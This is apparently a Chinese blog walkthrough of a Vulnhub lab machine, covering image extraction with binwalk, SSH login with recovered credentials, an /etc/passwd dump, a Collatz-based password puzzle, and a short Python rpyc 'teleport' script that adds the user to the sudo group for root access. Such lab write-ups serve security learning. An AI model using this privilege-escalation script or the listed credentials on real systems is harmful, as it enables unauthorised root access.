得到压缩密码后，解压到当前目录，是一张图片==（md，太像CTF了，直接binwalk必有问题）==

1	binwalk king -e --run-as=root

很奇怪为啥binwalk要加后面的参数了

解压后是一个user和压缩包，user必是ssh的信息

直接连接

1 2	ssh -p 22 floki@192.168.1.8 f@m0usboatbuilde7

CVE-2021-3156没用，补充wget下载文件夹命令

wget -r -np -nH http://192.168.1.10/CVE-2021-3156-main

使用-e "https_proxy=https://127.0.0.1:xxxx"设置单次代理

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
floki:x:1000:1000:floki:/home/floki:/bin/bash
ragnar:x:1001:1001::/home/ragnar:/bin/sh

列出/etc/passwd，可以看出还有一个用户叫做ragnar，根据readme.txt

_______________________________________________________________________Floki-Creation____________________________________________________________________________________________________


I am the famous boat builder Floki. We raided Paris this with our all might yet we failed. We don't know where Ragnar is after the war. He is in so grief right now. I want to apologise to him.
Because it was I who was leading all the Vikings. I need to find him. He can be anywhere. 
I need to create this `boat` to find Ragnar

而下面是boat的内容

1
2
3

#Printable chars are your ally.
#num = 29th prime-number.
collatz-conjecture(num)

麻了，真麻了，，，绕了好久好久，，，，，

上面的意思是，在所有可打印的字符中，输出克拉茨猜想对第29个素数的展开结果

def collatz(num):
    result=[109]
    while(num!=1):
        if (num%2==0):
            num=num/2
        elif(num%2==1):
            num=num*3+1
        if(num<255):
            result.append(int(num))
    return result

if __name__=="__main__":
    print(collatz(109))
    
    
#109, 164, 82, 41, 124, 62, 31, 94, 47, 142, 71, 214, 107, 161, 242, 121, 182, 91, 137, 206, 103, 155, 233, 175, 167, 251, 244, 122, 61, 184, 92, 46, 23, 70, 35, 106, 53, 160, 80, 40, 20, 10, 5, 16, 8, 4, 2, 1

解码之后直接把输出的密码登录mR)|>^/Gky[gz=\.F#j5P(

进入ragnar的文件夹中，有一个user.txt，类似flag

==rpyc_classic.py==这个玩意儿被每次ssh登录执行，并且是sudo权限下的执行（ragnar用户），直接插入一段权限提升的代码

查看该程序默认端口18812，因此只需要在ragnar的shell下编写一个提升自己权限的rpy文件即可

import rpyc

def shell():

    import os

    os.system("sudo usermod -a -G sudo ragnar")

conn = rpyc.classic.connect("localhost")

fn = conn.teleport(shell)

fn()

运行上面的程序python3 exp.py再切换回floki再切换回ragnar，即可运行提权命令，查看id，被添加了sudo权限，直接sudo -s得到最高权限

本文作者： Isabella
本文链接： https://username.github.io/2023/11/22/Vulnhub记录/
版权声明： 本博客所有文章除特别声明外，均采用 MIT 许可协议。转载请注明出处！